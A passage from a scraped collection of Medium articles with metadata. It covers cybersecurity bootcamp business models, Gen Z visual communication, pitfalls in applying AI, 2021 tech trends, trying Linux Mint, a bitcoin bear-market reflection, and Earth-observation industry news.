McDonald’s has a robust research program and could well produce a Michelin-starred burger. But it doesn’t, because it can make a lot more money with an easy to reproduce product that hits the spot and is cost-effective for the buyer and seller. Similarly, I’m sure a bootcamp program could aspire to the standard of 1970’s Berkeley, but it would be naïve to pursue such a vision unless it was a sponsored nonprofit/academic center.
Imagine our needs/constraints laid out on a bell curve. In a given sample/population, there will be some of us with more or less time to spend studying full-time, technical aptitude, etc. The majority of the group will cluster around the average (X̄).
The “Bell Curve”, or Normal Distribution. Image by Julie Bang © Investopedia 2019
Let’s assume you are the next Kevin Mitnick and you breeze through all your courses because you are a .1%’er. You demand that the curriculum be adapted to your needs, otherwise it’s a waste of your time and money.
Assume now, in our dramatized hypothetical, that your instructors agree and pivot towards having everyone learn how to write assembler code instead of that Mickey-Mouse Python. Most of your classmates cannot learn this overnight, and end up failing the course or dropping out. The program’s reputation, while impressive to an old-school elite, drives students that would have otherwise done fine in the old curriculum towards a more beginner-friendly competitor.
On the flip side, we might also see a “No Child Left Behind” situation where a desire to let more students complete a program results in the more advanced students feeling frustrated and the remainder ill-equipped to find an actual job.
Real-world instructors in for-profit schools thus face a dilemma: they must craft and sell an appealing dream (working in tech), but one that is attainable for the average student and profitable for the company. It is not a surprise, then, that the general modus operandi is to make a cohort of students close to hirable in approximately one business quarter, then rinse and repeat. As long as most students can find a job within 3 months to a year, it’s a job well done.
As mentioned earlier, this is probably a satisfactory deal for a good amount of people. I wouldn’t have seen myself becoming job-ready within half a year just studying on my own — there is plenty of value in guided instruction at a rigorous pace accompanied by peer accountability. It wasn’t a 4 year CS program, but that’s not what I paid for either. A bootcamp guarantees not a job at the end of the tunnel, but a foundational skillset that you can build upon, provided you put the work in yourself.
Explain Like I’m Five
Consider the infosec vendor/services landscape:
And this certification progression chart:
How would you approach these with a greenhorn who only knows how to vaguely ask, “How can I get into cybersecurity”? Would you really go through each nitty gritty section, knowing that they don’t have the context to understand? Let’s face it — unless they already have a background in IT, Software Engineering/Devops or Intelligence, it’s going to be difficult for someone to immediately understand nuances like security engineering vs architecture, threat hunting vs incident response.
There’s an academic joke I enjoy about how physicists like to model the world:
There is this dairy with cows and everything. The dairy farmer wants to increase his production of milk. To do this, he hires three consultants — an engineer, a psychologist, and a physicist. After a week, the engineer comes back with a report. He said: “If you want to increase milk production, you need to get bigger milk pumps and bigger tubes to suck the milk through.” Next came the psychologist. He said: “You need to make the cows produce more milk. One way to do this is to make them calm and happy. Happy cows produce happy milk. Paint the milking stalls green. This will make the cows think of grass and happy fields. They will be happy.” Finally, the physicist came to present her ideas. She said: “Assume the cow is a sphere….”
Although silly, this reminds me how models that “look” wrong (in this case, grossly oversimplified) can still be useful for understanding how things work. Too much information and complexity can be overload for someone with no pre-existing mental models, and while an over-simplification may be “wrong” in a technical sense, it can actually be useful in a pedagogical one.
If you’re like my instructors, you’d try to ELIF (explain like I’m five) and paint broad brushstrokes in the “Blue Team vs Red Team” dichotomy — a grown-up version of Cops & Robbers. SOC (Security Operations Center) Analyst and Penetration tester are fine starting point examples of what a career on each side might look like, and are a vivid illustration of the adversarial nature of InfoSec. This is enough complexity, in my opinion, for a pure beginner.
Let’s take a detour to the screencap below. Anyone who has done the Penetration Testing with Kali Linux or Hack the Box labs should find it easy to comprehend, but we could not expect the same from a complete novice. Knowledge has to build upon itself.
Command line output like this felt intimidating until my instructors taught me about well-known ports and the OSI model, how to interact with sockets, etc. It was necessary to first start off with necessary blocks of knowledge to build upon, despite it seeming trivial afterwards. In the same way, the crude early understanding of SOC and penetration testing roles provided clear paths of skill development that could fork later on. I believe that learning fundamentals in this “simplified” world helped insulate my early learning from noise and rabbit holes (it is very easy in security to fall into these).
Show Me The Money
Perhaps due to my business background, I come off as a sellout by empathizing with the bootcamp business rather than advocating for students. You may argue that it’s easy for me to take this position because I already have a job, and you‘re probably right.
But I consider myself and our alumni adults that entered a business transaction, not a moral contract, and believe it’s more productive to think about what could be rather than what should have been.
I’ve already discussed my thoughts on why the bootcamp experience (as it is) must by necessity disappoint certain people. In my opinion, this is more a failure of framework/mindset than curriculum planning — by trying to use a one-size-fits-all classroom, bootcamps have ended up with a satisficing solution rather than one that addresses diverse needs optimally.
Given that bootcamps want to grow revenue and students want different experiences, how can we arrive at a win-win?
Portfolio Diversification
Many moons ago when I worked in advertising, I had a client that manufactured cell phones. Their goal was to occupy a larger market share within the US, but they were struggling to compete with Samsung as an Android device.
After weeks of strategy sessions and brainstorming, we had to point out that their strategy of focusing on the early adopter techie crowd was actually driving themselves into a corner. What Apple and Samsung understood very well was that there is a place for ultra-luxe, flagship, and budget models, each one fitting the needs and wants of a subsection of the market.
The bootcamp experience as it stands is a bit like buying a Model T Ford: “You can have any color as long as it’s black.” The one concession I’ve seen is part-time programs for those who can’t afford to quit their jobs, but realistically they are not so different curriculum-wise.
The iTunes Model
There’s a saying that there’s two ways to make money — you either bundle things together or “unbundle” them to sell individual pieces. iTunes disrupted the record industry by making it possible to buy individual tracks rather than the whole album.
What is ironic in the battle between bootcamps vs higher education is that while bootcamps are “disruptive” in focusing on expedited practical training, they are also backwards in insisting on bundling the entire curriculum together. In an undergraduate program, on the other hand, you can choose to fulfill a math obligation with pre-calculus or linear algebra depending on your level of expertise. And if you have enough AP credits or have transferred, you don’t even need to have 4 whole years of school.
Provided that there are enough students in the classroom, why couldn’t we have the same for bootcamps?
Conveyer-Belt Sushi
It’s not o-makase quality, but conveyer-belt sushi is an experience in choice. You can be a heathen and eat only California rolls, or you can pick and choose whatever flavors pique your interest. You can also eat as little or as much as you’d like, provided the plate you’re looking for is available.
This model, in my opinion, stands to help bootcamps maximize revenue potential by fulfilling needs it could not with the current format, allowing:
Inexperienced/undecided students to test the waters with a preparatory/foundations course rather than commit to a huge purchase
Slower learners to take more time than the fast pace of the normal bootcamp allows
Fast learners to participate in more rigorous versions of the same topics, satisfying their intellectual needs
Those with prior foundational experience to specialize (like college majors) in niches like digital forensics, web application testing, etc. (upsell to existing students, and you can bring in adjuncts on contract)
Seasonal workers to fit learning in when life allows for it
Strong self-learners to work through self-paced material and labs without instructor/peer support (curation of materials is their core need)
Perhaps even more importantly, this model would support the reality that a career in tech involves lifelong learning, not just a one-time program.
Completing a bootcamp program is not the goal in itself — it’s to get a person tangibly closer to their career change/progression needs. Bootcamp operators would do well to provide modular options that stand to reach a longer tail of customers by fitting their needs more closely. | https://medium.com/atelier-de-s%C3%A9curit%C3%A9/mcdonalds-spherical-cow-and-itunes-a-defense-on-behalf-of-bootcamp-instructors-thoughts-on-c12c24f42df8 | ['Kevin Huang'] | 2020-12-18 21:22:34.531000+00:00 | ['Careers', 'Bootcamp', 'Career Advice', 'Career Change', 'Technology'] |
139 | Communication.JPG: The Bilingualism of Gen Z | Will this produce a more visually articulate generation? Charlotte, 20, New York City.
Fluid production is not limited to genre-jumping and collective networks. In the hands of our very pragmatic Gen Zs, it also involves frankensteining mediums, and surfing between the multitude of written and visual materials. Having grown up on Twitter, Instagram, Snapchat, and YouTube, Gen Zs have been trained to say less with words and more with images. The question is, has the limited word count and one second per post attention span encouraged Gen Zs to abandon proper sentence structure in favor of memes, gifs, and images? And will this produce a more visually articulate generation? What will this mean as they move into the professional world, colliding with older generations, and discovering that communicating your ideas and arguments is the difference between professional success and failure? Or, will Gen Z change the game? Charlotte Force helps us navigate Gen Z’s visual/textual bilingualism and hopefully shed some light on what it might mean for the future of communication.
My generation came into the world a little after the Internet, around the same time as email. We came of age, however, with digital photography and smartphones. Saddled with a saturation of visual media unprecedented in history — with terabytes of storage and unlimited data plans for $60 a month — how could Gen Z do anything else but use it for the most mundane, ubiquitous, and complex of human functions: communication.
The expressive explosion of language use online has accelerated, or at least amplified, the process of language change. Writing has always been accompanied by images. They are almost like an additional language that we are all fluent in. You’d have much greater success communicating the idea of “flower” to a stranger by drawing, than by speaking or writing in a language they don’t understand. And images are subtle in a different way than words, or at least, are worth a thousand of them. Images, ultimately, are like a language because they are a way we communicate. Our textual-visual bilingualism creates endless subtlety in practice. Emojis and GIFs are a crucial part of the 21st century’s textual-visual era of language. Take the example of a humble, single emoji. It operates on many levels: the literal sense, like an apple emoji which can simply denote the fruit. But the figurative sense of an emoji is open for interpretation. I have spent non-trivial time analyzing the addition of a red heart to the end of an iMessage, or the placement of a smiley face, in the way that an academic might read between the lines of a poem.
More than a reduction of “proper” language, I see the pervasiveness of images in our communication as an actualization of our textual-visual bilingualism. Thanks to Google Photos, my emoji keyboard, the Bitmoji app, and Snapchat, I always have a shortcut to communicate both visually and textually. Gen Z has native fluency in both means of communication. As with any native bilingualism, we can switch between means, or mix them naturally. In the same way that an expression can’t translate properly between French and English, the feeling evoked by a GIF can’t be translated into words.
With our fluency in text and images comes an awareness of when to use them, we experience the ambiguity of images day-to-day. We know exactly how abbreviations, like Twitter’s 140 character limit, reduce meaning; how distracted communication, like Snapchats that disappear after ten seconds, reduce attention span. But we operate on a basis of necessity — a 3:00 a.m. tweet about your zodiac sign doesn’t need to be your magnum opus. We don’t say less with words because of images. We choose what to say with words, and with images, and with a blend of both.
Being articulate in melding words and images has not taken away our ability to choose when we include images or abbreviate our ideas. We are constantly assessing the ambiguity of images, dealing in varied mediums of communication simultaneously, and sorting through reams of information. I think it’s made us creative, communicative, and adept multitaskers. If anything, I think the known benefits of bilingualism can be attributed to the textual-visual bilingualism of Gen Z. We know how to mode-switch between varying degrees of visual imaging when we communicate. I don’t use emojis in work emails, but I use a lot of smiley faces in texts to my friends — and sometimes it is fun to add a relevant New Yorker cartoon to the end of a class presentation. | https://medium.com/irregular-labs/communication-jpg-the-bilingualism-of-gen-z-12554e410fd | ['The Irregular Report Irregular Labs'] | 2019-05-03 20:27:23.233000+00:00 | ['Art', 'Fluidity', 'Photography', 'Technology', 'Social Media'] |
140 | The Problem With Artificial Intelligence Isn’t the Science, It’s the Application | Yeah, I’m gonna talk about War Games.
Artificial Intelligence gets a bad rap, and as someone who has spent the last decade applying AI, I totally understand why. The science of AI and machine learning is solid, defensible, and utterly useful. It’s how we’re applying that science that rarely makes any sense.
This isn’t a new phenomenon and it didn’t start with AI. We’re in the stage of the evolution of artificial intelligence in which the technology has surpassed our formerly rock-bottom expectations. When this happens, as has happened with other emerging technologies in the past, we start leapfrogging those expectations to cause two problems:
1. We produce dystopian stories of future state. In this case: The machines destroy us or rule us.
2. We start looking to cash in by applying the new technology in the most haphazard ways possible.
Both of these outcomes are expected and ill-advised, so here’s what we do about them.
Our New Machine Overlords
I don’t want to talk too much about the dystopian future of AI, I just want to make sure we’re all on the same page about what AI really is so we can best figure out how to use it. That starts with making sure we all agree what it’s not.
Computers don’t think. Most of what you read about the machines rising up and deciding humanity must be wiped out is bunk. Everything a computer does is, ultimately, designed and programmed by a human. Self-consciousness is not an option, scientifically speaking. We don’t even know enough about our own self-consciousness to put the machine equation together. We’re guessing. This is why we create what seem like self-fulfilling prophecies of doom.
But keep in mind, this same stopgap measure — that machines must be programmed by humans — is also its own greatest weakness. This is what Elon Musk and his ilk are really worried about. We humans can surely design systems with enough automation and enough stupidity to produce some scary outcomes.
This is not a new concept. In fact, the now-ancient movie War Games nailed the stupid human scenario almost perfectly, when our military computer decided that the game against the Soviet military computer — the game that launches nuclear missiles and then the world blows up — needed to be finished. Ultimately our computer had to be taught that no one wins that game. With tic tac toe.
Oh. Spoiler alert. See it anyway. It still holds up.
But the real problem with that kind of doomsday scenario is much simpler (and less Hollywood blockbuster friendly). If we’re going to design nuclear launches controlled by computers, let’s make sure it takes two humans to LAUNCH the missiles, not require two humans to STOP the automated launch.
War Games did this. What would have blown up the world is that quick scene where one military launch key guy is pointing a gun at the other military launch key guy who was hesitating turning his launch key. If there’s an issue with that movie, it’s that that scene wasn’t explored, because the next three seconds of what those two humans do decide whether or not the movie takes a huge left turn and vaporizes us all.
And THAT, in an exaggerated nutshell, is the problem with how we’re applying AI today.
Well, again, it’s two problems:
1. Artificial Intelligence, Machine Learning, Automation, Chatbots, Alexa, all of it, is best applied, and probably only usefully applied, when we automate only those parts that can be perfectly automated.
2. AI, ML, blah blah blah, is best SOLD as magic that can automate any task that any human can do, because humans are expensive and make mistakes.
Are we that far removed from “voicemail hell” that we’ve forgotten the pain of all-in automation?
We might be. I see those promises made all the time. You do too, in any Watson commercial.
Why Do We Replace Amy?
We attack our AI projects by trying to replace expensive, mistake-making humans, immediately and completely, with machines. I’ll give you a great example: AI scheduling assistants. Great idea, questionably executed.
Anyone who has tried to get two or more people in the same place at the same time has dealt with scheduling hell, having to go back and forth several times to nail down the exact time everyone can meet. The use case for automation here is totally valid and the solution is totally valuable. The science is also there, since most of our 9-to-5 is documented digitally and that calendar data is at least available, if not public.
It is super, super easy to write the script that can offer options, take requests, even prioritize some preferences, and slap a block of time on two digital calendars.
So why does this fail more often than it succeeds?
Because the expensive, mistake-making executive assistant wasn’t the problem. That part of the system wasn’t even expensive, nor mistake-making. In fact, I usually run into the same scheduling problems whether the executive assistant is a machine or a human.
Because the problem is actually the executive.
Well, again, it’s several problems. But here are the top three:
1. The executive rarely blocks off all the time on their calendars that needs to be blocked off. Unless it’s a dedicated meeting, it’s likely not on his or her calendar. And it never will be.
2. There are too many moving parts around the executive. Schedules are documented but they change. Priorities are undocumented and they also change.
3. Outliers rarely get programmed into the system. I once tried to have a conference call with someone overseas, and his AI assistant did not understand that I wasn’t interested in doing that call between 1:00 a.m. and 4:00 a.m. my time. Instead of giving me midnight or 5:00 a.m. as an option, it just kept pushing the same times farther out on the calendar.
Ten seconds to text my colleague, ten seconds for him to text me back. Problem solved. In fact, he was gracious enough to schedule for 6:00 a.m. my time.
It’s the Human (Dummy)
The missing piece is what I usually refer to as logic engineering or decision design around a complex system. Neither of these concepts are new, but they take on a new relevance when applied to AI, tackling some of the same stuff that happened with web, mobile, etc:
1. AI (and so on) is a new science.
2. The people with all the AI science experience have little, if any, application experience.
3. The people with the application and business experience might be either dismissive or fearful of the science, or they just don’t have the time to understand it.
This is why teenage Matthew Broderick had to train the military war computer not to blow up the world while old-ass Professor Falken had to stand behind him, providing guidance and smiling smugly while the world was seconds away from blowing up.
OK, parts of the movie don’t hold up.
Especially when you think about the fact that Professor Falken should have coded for that contingency in the first place (see the scheduling-bot outlier problem above) or at the very least NOT AUTOMATED that part of the process.
This wisdom gap is only one possible reason for skipping the logic and decision engineering stage, resulting in AI application failure. There are tons of others. Money is another one. FOMO is another one. Malfeasance. Ignorance. And on and on. Oddly enough, it’s the same kind of tug of war happening around blockchain and Bitcoin, with just as many misunderstandings and myths, and two very distinct, very dug-in sides on either side of viability.
My point is, whether it’s Global Thermonuclear War or grabbing coffee with a colleague, there’s a new science here in decision and logic engineering, one that’s playing catch-up in the AI world. It’s around the application. It’s not in whether we automate, but where and how we choose to automate.
Automation, AI, ML, data science, the best of it will always involve the 80/20 rule, and you can invoke that rule all over the place. Systems should be 80% automated, 20% human. The path to get there should start with the reverse and work its way through the most complex problems first. Subsystems should be analyzed as 80% automatable, 20% non. Viability rules should be 80% norm, 20% outlier.
Those numbers aren’t exact and the lines of division are always moving, but that’s the beginning of logic engineering. When we forget to approach AI solutions with those types of application breakdowns in mind, that’s when we get dystopian (or stupid) outcomes.
So how do we stop the stupid outcomes? We develop sound AI implementation strategy that bridges the gap between the science and application. Read more in my next post: Understanding How To Implement an AI Strategy. | https://jproco.medium.com/the-problem-with-artificial-intelligence-isnt-the-science-it-s-the-application-3c640a1bbecf | ['Joe Procopio'] | 2018-07-25 16:23:25.266000+00:00 | ['Entrepreneurship', 'Artificial Intelligence', 'Machine Learning', 'Technology', 'Startup'] |
TECH PREDICTION for 2021

It goes without saying that 2020 was the most disruptive year in the past decade or more. 2020 literally forced new migrations, not only for consumers but also for global businesses.
ONE OF THE BIGGEST is the MIGRATION of employees from their office cubicle to their home desk.
Businesses had to quickly adapt and implement security and logistic measures, performance-tracking systems, new server infrastructures that allow employees to access internal data securely from outside the office, and more.
This may seem like a simple process, but depending on the size of the organization and the flexibility of their internal systems (digitalized/non-digitalized), many businesses simply couldn’t cope with this immediate need for change and had to close shop, leaving many employees without a job.
Some that were already fully digitalized flourished and announced permanent work-from-home policies post-COVID; Twitter and Dropbox, for example.
This movement paved the way to the SECOND MIGRATION. ENTREPRENEURSHIP.
While some people immediately began looking for companies that have a fully digitalized framework and job opportunities, others have seen this as an opportunity to launch their own business, a lot of them flocking towards eCommerce/eServices.
The common denominator in 2021 will be DIGITAL TRANSFORMATION.
Businesses will need to start or continue the process of being omnipresent online, both from an organizational standpoint and for their customers.
A successful digital transformation strategy must include:
Customer Experience, Data & Insights, Strategy & Leadership, Technology, Operations, Culture & People, Organization, Marketing, Cybersecurity, and Brand Management.
Transformation is different for every company and sadly, many digital transformations fail. For some businesses, the disruption may be so great that their long-term strategic vision will need to be overhauled. Any digital transformation roadmap that does not offer added value to the user will need to be reimagined.
With 2021 just around the corner, here are 5 topics in Tech & Digital Transformation that are worth keeping an eye out for.
1. AI Chatbots
If you’ve chatted with any retailer online in the past months, chances are, you’ve spoken to an AI-powered chatbot.
AI fed with data scraped from real conversations, combined with NLP, gives a rather scary result: human-like conversations that can be text-only or even voice-enabled.
Some of the benefits Voice AI can bring to businesses are:
- Zero wait time, 24/7 instant availability
- enhanced customer insights
- better two-way interaction
- increased productivity
- fraud detection
- & more.
It is expected that more companies will want to automate customer experience processes with AI-powered chatbots rather than scripted chatbots.
Not only that, but we will see chatbots participating in the sales funnel, providing relevant, personalized recommendations.
My guess is if you’re looking to stay on top of the game in 2021, implementing AI-powered chatbots for your business is one crucial step for you to take.
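To see the contrast with AI-powered bots, here is roughly what a purely scripted chatbot amounts to: a handful of fixed keyword rules plus a canned fallback (a toy sketch; the rules and answers are invented):

```python
import re

# Minimal scripted chatbot: fixed keyword rules, no learning.
# Anything outside the script falls through to a canned fallback,
# which is the limitation that motivates AI/NLP-powered bots.
RULES = [
    (re.compile(r"\b(hours|open)\b", re.I), "We are open 24/7 online."),
    (re.compile(r"\b(refund|return)\b", re.I), "Returns are accepted within 30 days."),
    (re.compile(r"\b(ship|delivery)\b", re.I), "Standard delivery takes 3-5 days."),
]

def reply(message: str) -> str:
    for pattern, answer in RULES:
        if pattern.search(message):
            return answer
    return "Sorry, I didn't understand. Connecting you to an agent..."

print(reply("What are your opening hours?"))  # We are open 24/7 online.
print(reply("My parcel is late"))             # falls back to a human agent
```

An AI-powered bot replaces the hand-written rule table with a model trained on real conversations, which is what makes personalized recommendations inside the sales funnel possible.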
2. Advanced Data Analytics: Data Quality Management to Become More Prominent
Following an unpredictable 2020 and global pandemic, using analytics in the wake of innovation and digital transformation globally is not just a recommendation but a must.
Managing data quality doesn’t just revolve around having high-quality data to stack and analyze. It implies cleaning and preparing data, distributing it across your organization (remote workers included), managing the data, and, ultimately, examining it with the help of AI, RPA, and other tools, and then making relevant business decisions.
Data Analytics providers are already developing new infrastructures “DaaS” services to help businesses reconfigure their business processes, and what better way to do so than AI and Cloud Computing.
DaaS: Data as a Service will be more prevalent, as businesses will have more visibility into AI, and cloud systems will reconfigure their products and services to accommodate the ever-growing demand.
Want to learn more about how Data Analytics can help your business? Reach out and ask specific use cases & demos directly.
3. Hyperautomation
Hyperautomation brings together different technologies to undertake end-to-end automation of an organization’s complex business processes, including operations where subject matter experts were once required, under a unified and intelligent system.
Known as the core enabling technology of Hyperautomation, RPA enriched by AI and ML expands its capability in process discovery, empowering businesses to drive an unprecedented scale of automation while maintaining governance and data security.
What are the benefits of Hyperautomation?
Hyperautomation provides a more precise overview of structured and unstructured data from various business applications and operations.
This way, businesses can make better-informed decisions based on the data gathered and analyzed by automation systems, and enable employees to cooperate with robots across a full cycle of automation at scale, from discovering automation opportunities to measuring the ROI.
4. Digital Marketing — Image and video SEO for visual searches
As more and more users discover visual search techniques, the overall landscape of SEO will diversify along with it, spanning into Voice, Image, and Video Search. With the introduction of the AR lens (Google Lens, Snapchat’s Spectacles & more), your business can capitalize on this new trend and be among the first in its line of business with an established presence in each channel.
What is Visual Search?
Simply put, visual search is a search algorithm that uses real-world images as a stimulus for the online search.
The top 3 visual search engines right now are Google, Amazon, and Pinterest.
While major retailers have already grasped the power of Visual Search, it’s just as important for any type of business to take advantage of this trend.
Why is Visual Search important?
Here are a few facts:
* 90% of the information transmitted to the human brain is visual. (MIT)
* 13 milliseconds. The time it takes for the human brain to process an image.
* Images have an interaction rate of 87%, compared to 4% or less for other types of posts, such as links or text in Social Networks.
Here are the basics you can apply to your current SEO strategy:
Always include alt text in your image descriptions, which crawlers use to classify images.
Create a dedicated sitemap or add images to your existing sitemap, where they are even easier to crawl by search engines.
Include targeted keywords in your image file name.
Use quality images and videos, minimum HD.
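As an illustration of the sitemap tip (a standard-library sketch; the page and image URLs are made up), an image sitemap using Google's image sitemap extension can be generated like this:

```python
import xml.etree.ElementTree as ET

# Namespaces for the sitemap protocol and Google's image extension.
SITEMAP_NS = "http://www.sitemaps.org/schemas/sitemap/0.9"
IMAGE_NS = "http://www.google.com/schemas/sitemap-image/1.1"

def image_sitemap(pages):
    """pages: iterable of (page_url, [image_urls]) pairs."""
    ET.register_namespace("", SITEMAP_NS)
    ET.register_namespace("image", IMAGE_NS)
    urlset = ET.Element(f"{{{SITEMAP_NS}}}urlset")
    for page_url, images in pages:
        url = ET.SubElement(urlset, f"{{{SITEMAP_NS}}}url")
        ET.SubElement(url, f"{{{SITEMAP_NS}}}loc").text = page_url
        for img in images:
            image = ET.SubElement(url, f"{{{IMAGE_NS}}}image")
            ET.SubElement(image, f"{{{IMAGE_NS}}}loc").text = img
    return ET.tostring(urlset, encoding="unicode")

xml = image_sitemap([
    ("https://example.com/red-running-shoes",
     ["https://example.com/img/red-running-shoes-side.jpg"]),
])
print(xml)
```

Note how the image file name itself carries the targeted keyword ("red-running-shoes"), combining two of the tips above in one place.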
5. Voice UI
The growing use of voice search started with the 1st digital voice assistant implemented in a smartphone.
Due to the development of IoT, 2021 will bring an unprecedented increase in Voice Search, not just from mobile devices but from smart speakers, smart TVs, smart displays, and other household or carry-on devices.
Furthermore, we can expect smart assistants to become more proactive, including delivering personalized recommendations to different users.
The voice and speech recognition market is expected to grow at a 17.2% compound annual growth rate to reach $26.8 billion by 2025.
As voice recognition continues to improve, and usage of voice assistants like Alexa, Cortana, Siri, and Google continues to grow, it will become even more challenging to stay ahead of your competitors.
It’s a good idea to learn how your business can rise on top of this trend and be prepared.
Read more about how you can implement a diversified voice search ranking strategy for the main voice search engines here.
These are only 5 of the most important changes Technology will bring in 2021.
It’s incumbent on you to figure out which technologies can benefit your business and stay ahead of your competition.
Find more great articles and resources on Dokalink.com

Source: https://medium.com/@darkanalytica/tech-prediction-for-2021-89e5b7c318cb (Leonard Dumitru, 2020-12-24). Tags: Marketing, Digital Transformation, Trends, Technology, 2021 Technology Trends.
I’m giving Linux Mint a try after abandoning Ubuntu earlier this year.

Toward the end of last year, I recycled an old laptop into an Ubuntu machine to play around with .NET Core and Docker in Linux, and I was very impressed. It had been a long time since I’d last touched Linux, and for the most part everything worked right out of the box.
Hardship began when I tried to use it for virtual school in Fall 2020. It was wildly frustrating to not have feature parity with the Linux variants of apps like Zoom while teachers were instructing students to perform specific actions that weren’t available.
The real deal-breaker was printing, though. I spent a day trying and just couldn’t get it working, so I rolled back to Windows. Imagine my delight when the first thing I saw upon logging in with Mint was “adding printer.” How wonderful!

Source: https://medium.com/@adamprescott/im-giving-linux-mint-a-try-after-abandoning-ubuntu-earlier-this-year-d806f5eb01ea (Adam Prescott, 2020-12-24). Tags: Work, Technology, Productivity, Linux, Programming.
When is the next bitcoin bull run?
A reflection for the bulls in a bear market
Photo by Andre Francois on Unsplash
I love the fact that certain concepts can be expressed clearly in one word. I like the word ‘perspective’ so much. Perspective is so important in today’s world, especially when we consider the new trend of decentralization. Every decision is based on mental judgment and mental judgment is based on perspective. Everyone claims to be right and their claim is based on information. The information doesn’t have to be false for the judgment to be wrong. Bitcoin is below $7k, it’s time to make fundamentalists of speculators.
When bitcoin went down to $6k earlier in the year and then got back to $8k, many thought they had seen the worst. But then, it struggled to stay over $9k. And as of writing, it’s back on the $6k level. This level seems unfair to traders (or speculators) who bought in at $12k (and above). Of course, I got in too during those periods but it wasn’t fomo. I was going to get in during that time regardless of the price (just as I am still going in right now at the $6k range). Cryptocurrency, from my perspective, remains a thing of the future. Yes, we are already seeing the reality but the development and full adoption will be slower than many first thought.
In the calmness and quietness that comes with the bear market, I decided to seek out some insights and look through perspectives I had not paid attention to. This is not the first bear market in crypto. What happened during the previous bear markets, and what was the market trend?
It began in November 2013. Bitcoin price was about $1.2k. An all time high at that time. And then the plunge began. First the Mt. Gox issue started as a rumour, but then it became confirmed and a reality. The price of bitcoin sank to $600. And then continued into the abyss in the following weeks and months. At one point, it was as low as $110. Think about it; something that was once worth $1,200 now became $110. That’s more than a 90% drop! How bad has it gotten in 2018? $20k at all time high to $6k (which is the lowest so far, I believe). That is still a drop of 70%. Am I saying you should be grateful that things are not worse? No! I am just giving you some perspectives here.
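The drawdown percentages quoted here are easy to verify:

```python
def drawdown(high, low):
    """Percentage fall from a high to a low."""
    return (high - low) / high * 100

# 2013-14 bear market: $1,200 peak down to $110.
print(round(drawdown(1200, 110), 1))    # 90.8 -> "more than a 90% drop"
# 2018 so far: $20k all-time high down to $6k.
print(round(drawdown(20000, 6000), 1))  # 70.0 -> "a drop of 70%"
```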
The other point that really got my attention was the period of time the value of bitcoin stayed below its all-time high after the $1,200 peak of November 2013. Throughout 2014, it was gloomy. There was not much uptick in 2015. Bitcoin started gathering momentum again in 2016. The all-time high of 2013 was reached again in March of 2017. That is 4 good years. Of course, the price roamed as high as $750 during this 4-year period, but it was not convincingly over that price. So, if you bought the top in November 2013, you had to wait till March 2017 to break even.
If we mirror this event of November 2013 to March 2017 over what the market is experiencing in 2018, you will get a classical perspective to this bear market. Yes, the market is definitely larger than it was 4–5 years ago, but the fundamentals remain the same. I don’t think the drop will be up to 90% (I think 70% is fair enough) but it could drop lower. One thing I am certain of is that this bear market is not ending anytime soon. If it took about 40 months to get back to the all time high in the previous bear market, it might take at least a quarter of that for this market to get back at the level we all cheered about. Personally, I have set my mind to January 2019. Not necessarily to see bitcoin at $20k, but to see the bulls take over fully. It could take longer, but this bear market shouldn’t last up to 20 months.
This is the time for the hype to die down and real information to gain more ground. There is blood on the streets, so it is definitely a good time to buy. However, it matters what you buy. I am definitely not selling any serious stakes in my crypto assets for now. And I can hold on for as long as I want. That is the real definition of ‘money you can afford to lose’. In the real sense of it, nobody has money they want to throw away. But if you have to sell in 6 months or less, you are not playing smart.
The key to winning in trading and investing is to buy low and sell high. If you can’t wait for forever, you will buy high and sell low. The last time it was 4 years, let’s hope it’s below 2 years (or much less) before $20k again. Just to keep in perspective, we are still 4 months in on this bear market. Brace up!
P.S. You can connect with me on Twitter here

Source: https://medium.com/hackernoon/when-is-the-next-bitcoin-bull-run-2fcbe1c54131 (David O., 2018-06-25). Tags: Cryptocurrency, Bitcoin, Blockchain, Tech, Technology.
The stage of maturity — Earth observation in a new era of space exploration

“The maturing space industry is evident with players in both private and public sectors accelerating the recent advances in science and technology that makes operating in space more viable for commercial and research interests.”
Space commerce is enjoying a renaissance period mainly due to technological advances that have dramatically decreased cost and increased data and related services. A $17+ billion market (and growing), today’s space industry is on the verge of entering maturity — the stage of self-discovery, boldness, and adventure.
The maturing space industry is evident with players in both private and public sectors accelerating the recent advances in science and technology that make operating in space more viable for commercial and research interests. This year thus far, the European Space Agency (ESA) tested its new 3D printed rocket thrust chamber to help design more efficient rocket engines. Almost at the same time, Orbex, a commercial British space company, unveiled the world’s largest 3D printed rocket engine that is lighter, fuel efficient, and expected to launch in two years. ESA and the UK Space Agency also recently examined preliminary designs of the world’s first air-breathing rocket engines that, if valid, will also reduce weight in exchange for more payloads. There is of course also SpaceX’s reusable rocket technology that successfully launched its Falcon Heavy in late 2018 with a payload of 64 satellites, and plans to launch its Big Falcon Rocket that will carry a heavier payload later this year. Seattle-based satellite design and manufacturing company, LeoStella, inaugurated its smallsat design factory, signifying market opportunities. The Australian National University released research results showing that 2D materials can withstand space’s harsh environment. The materials can enhance space instruments. Facebook is designing space laser communication satellites to provide internet access widely, while Amazon Web Services (AWS) commenced its Ground Station satellite data collection services, allowing for faster and cheaper data processing. These innovations in space hardware and services are a game changer for the entire industry.
“. . . more non-traditional players are entering the field.”
A microcosm of the overall space industry trend, Earth observation — that is, the collection of information about Earth — is subsequently entering a new era as indicative of activities in the first quarter of 2019, including predictions on its commercial viability, that the sector will become conventional in the UK within a decade, and its emerging market in Europe. Moreover, more non-traditional players are entering the field.
Argentinian private firm, Satellogic, announced its plans to map the Earth at 1-meter resolution weekly and signed a launch agreement with China Great Wall Industry Corporation to launch a constellation of 90 satellites. With a U.S. $72 million grant from China, Egypt’s high-resolution EO satellite launched with success. In the meantime, earlier launched satellites are now providing data.
China’s National Space Administration successfully tested two EO satellites that provided information on air pollution and data that can monitor agriculture and crop yield. Both satellites launched in 2018. The Argentina Space Agency’s synthetic aperture radar satellites, which launched in October 2018 to examine Earth’s soil moisture and surface deformation, released its first images to the public. ESA released data on methane and ozone in Earth’s lower atmosphere from its Sentinel-5 satellite that launched in 2017.
Other data providers are moving data to the cloud. The United States Geological Survey made its Lidar data over the US available as a public dataset via AWS. NASA’s Earth Observing System Data and Information System (EOSDIS) is gradually moving its data to AWS. The move counterbalances the growth in data and the resulting difficulties for distributing and analyzing the data.
“Billions of image pixels recorded by the Copernicus Sentinel-2 mission have been used to generate a high-resolution map of land-cover dynamics across Earth’s landmasses.” credit: ESA
